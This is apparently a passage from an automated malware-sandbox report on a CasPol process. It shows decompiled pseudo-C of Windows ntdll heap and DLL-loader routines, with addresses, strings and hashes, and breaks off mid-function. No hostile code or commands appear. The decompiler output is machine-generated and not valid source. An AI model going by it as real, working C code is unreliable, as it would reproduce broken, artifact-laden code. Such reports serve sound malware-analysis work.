                                                                0x01692422
                                                                0x01692422
                                                                0x01692417
                                                                0x016923c5
                                                                0x016923b2
                                                                0x00000000

                                                                Strings
                                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01692403
                                                                • HEAP[%wZ]: , xrefs: 016922D7, 016923E7
                                                                • HEAP: , xrefs: 016922E6, 016923F6
                                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016922F3
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                • API String ID: 0-1657114761
                                                                • Opcode ID: 797aeedcdbbd17f30b254386bf4459370ec0da079ccdcceaba0ea770fbd39c76
                                                                • Instruction ID: 6cbbb5fd96b32e3e380146cec5e72e02796218d1aeac8ab3811fe86483317cba
                                                                • Opcode Fuzzy Hash: 797aeedcdbbd17f30b254386bf4459370ec0da079ccdcceaba0ea770fbd39c76
                                                                • Instruction Fuzzy Hash: 03D1C274640645AFEB19CFA8C990BBABBF6FF48300F15856DD9579B342E330A981CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164A229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 69%
                                                                			E0164A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0164DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01669730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E016EA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01669660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0162B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01647D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E016E138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01647D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01647D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E016E1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01647D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01647D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E016E1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0167D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                0x0164a229
                                                                0x0164a231
                                                                0x0164a23f
                                                                0x0164a242
                                                                0x0164a244
                                                                0x0164a24c
                                                                0x0164a255
                                                                0x0164a25a
                                                                0x0164a25f
                                                                0x01691c76
                                                                0x01691c78
                                                                0x01691c7e
                                                                0x01691c7f
                                                                0x01691c81
                                                                0x01691c82
                                                                0x01691c84
                                                                0x01691c89
                                                                0x01691c8b
                                                                0x01691c9e
                                                                0x01691c9e
                                                                0x01691cab
                                                                0x01691cb2
                                                                0x00000000
                                                                0x01691cb2
                                                                0x01691c8d
                                                                0x01691c92
                                                                0x00000000
                                                                0x00000000
                                                                0x01691c94
                                                                0x01691c98
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01691c98
                                                                0x0164a265
                                                                0x0164a265
                                                                0x0164a266
                                                                0x0164a26f
                                                                0x0164a270
                                                                0x0164a276
                                                                0x0164a277
                                                                0x0164a279
                                                                0x0164a27e
                                                                0x0164a282
                                                                0x01691db5
                                                                0x01691dbb
                                                                0x01691dc1
                                                                0x01691dc5
                                                                0x01691de4
                                                                0x01691de9
                                                                0x01691dc7
                                                                0x01691ddc
                                                                0x01691de1
                                                                0x01691def
                                                                0x01691df3
                                                                0x01691df7
                                                                0x01691dfe
                                                                0x01691e06
                                                                0x0164a302
                                                                0x0164a308
                                                                0x0164a308
                                                                0x0164a288
                                                                0x0164a28d
                                                                0x0164a294
                                                                0x01691cc1
                                                                0x0164a29a
                                                                0x0164a29a
                                                                0x0164a29a
                                                                0x0164a29f
                                                                0x01691ccb
                                                                0x01691cd1
                                                                0x01691cd8
                                                                0x01691cea
                                                                0x01691cea
                                                                0x01691cd8
                                                                0x0164a2a9
                                                                0x0164a2af
                                                                0x0164a2bc
                                                                0x01691cfd
                                                                0x0164a2c2
                                                                0x0164a2c2
                                                                0x0164a2c2
                                                                0x0164a2c7
                                                                0x01691d07
                                                                0x01691d0d
                                                                0x01691d14
                                                                0x01691d1f
                                                                0x01691d21
                                                                0x01691d2c
                                                                0x01691d2c
                                                                0x01691d2c
                                                                0x01691d47
                                                                0x01691d47
                                                                0x01691d14
                                                                0x0164a2cd
                                                                0x0164a2d2
                                                                0x0164a2d9
                                                                0x01691d5a
                                                                0x0164a2df
                                                                0x0164a2df
                                                                0x0164a2df
                                                                0x0164a2e4
                                                                0x01691d69
                                                                0x01691d6b
                                                                0x01691d76
                                                                0x01691d76
                                                                0x01691d76
                                                                0x01691d91
                                                                0x01691d91
                                                                0x0164a2ea
                                                                0x0164a2f0
                                                                0x0164a2f5
                                                                0x01691da8
                                                                0x01691dad
                                                                0x01691dad
                                                                0x0164a2fd
                                                                0x0164a300
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                • API String ID: 2994545307-2586055223
                                                                • Opcode ID: e1b45d452ac4524cc7bdeba4f56cc2f7012735850a25deed1f38ea4fa1280f60
                                                                • Instruction ID: d1e5a9e87a6a3a289513d56bc0cdc551f2bb00536d3e1391c7e4b603667a2cf7
                                                                • Opcode Fuzzy Hash: e1b45d452ac4524cc7bdeba4f56cc2f7012735850a25deed1f38ea4fa1280f60
                                                                • Instruction Fuzzy Hash: EB510532245682AFE712DBA8CC48F677BE9EF85760F180868F952CB391D734D805CB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01658E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 44%
                                                                			E01658E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x171d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1718464; // 0x74cc0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1715780 & 0x00000003) != 0) {
							E016A5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1715780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0166B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1717984; // 0x11c2b60
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1718464; // 0x74cc0110
					 *0x171b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01659B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1715780 & 0x00000005) != 0) {
						_push(_t49);
						E016A5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                0x01658e0f
                                                                0x01658e16
                                                                0x01658e19
                                                                0x01658e1b
                                                                0x01658e21
                                                                0x01658e7f
                                                                0x01658e85
                                                                0x01699354
                                                                0x0169936c
                                                                0x01699371
                                                                0x0169937b
                                                                0x01699381
                                                                0x01699381
                                                                0x0169937b
                                                                0x01658e9d
                                                                0x01658e9d
                                                                0x01658e29
                                                                0x01658e2c
                                                                0x01658e38
                                                                0x01658e3e
                                                                0x01658e43
                                                                0x01658eb5
                                                                0x01658eb9
                                                                0x016992aa
                                                                0x016992af
                                                                0x016992e8
                                                                0x016992e8
                                                                0x016992af
                                                                0x01658eb9
                                                                0x01658e45
                                                                0x01658e53
                                                                0x01658e5b
                                                                0x01658e5f
                                                                0x01658e78
                                                                0x01658e78
                                                                0x01658e7d
                                                                0x01658ec3
                                                                0x01658ecd
                                                                0x01658ed2
                                                                0x01658ed2
                                                                0x01658ec5
                                                                0x01658ec5
                                                                0x00000000
                                                                0x01658e7d
                                                                0x01658e67
                                                                0x01658ea4
                                                                0x0169931a
                                                                0x00000000
                                                                0x00000000
                                                                0x01699320
                                                                0x01658ea4
                                                                0x01658e70
                                                                0x01699325
                                                                0x01699340
                                                                0x01699345
                                                                0x01699345
                                                                0x01658e76
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Strings
                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0169933B, 01699367
                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0169932A
                                                                • LdrpFindDllActivationContext, xrefs: 01699331, 0169935D
                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 01699357
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                • API String ID: 0-3779518884
                                                                • Opcode ID: def2b98634658c98af58b39d9f5d21dbe265d9de407243c21a7bab3c2e3caa35
                                                                • Instruction ID: 9e6c8140a968b58666795a693f75d30df32a553a6cbb64c0b3c5846437c2d1b4
                                                                • Opcode Fuzzy Hash: def2b98634658c98af58b39d9f5d21dbe265d9de407243c21a7bab3c2e3caa35
                                                                • Instruction Fuzzy Hash: C0417D31A003119FEFB6AB0FCC49A3677BDBB40318F06856DDD4497A92E7B05C819781
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E49A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                • API String ID: 2994545307-336120773
                                                                • Opcode ID: c8baa1472cba264fee9725e2df9140826eb689fc66ddc401cde81c47dc783aff
                                                                • Instruction ID: 18e30b1244c23a92d2623dd536444d3fa822626a83eadb139402a13f8910175b
                                                                • Opcode Fuzzy Hash: c8baa1472cba264fee9725e2df9140826eb689fc66ddc401cde81c47dc783aff
                                                                • Instruction Fuzzy Hash: 4B31E031202514AFD322DBADCC8DF6777E9EB04631F254259F906DB285DA70E884CB69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016499BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 78%
                                                                			E016499BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E016DFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E016EA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0167D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E0162B150();
										} else {
											E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E0162B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x1716378 = 1;
											asm("int3");
											 *0x1716378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0164A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0164A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0164BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E016EA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0164A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0164A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0167D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E0162B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x1716378 = 1;
									asm("int3");
									 *0x1716378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E016DFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E016EA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0167D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E0162B150();
													} else {
														E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E0162B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x1716378 = 1;
														asm("int3");
														 *0x1716378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0164A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0164A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0164BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
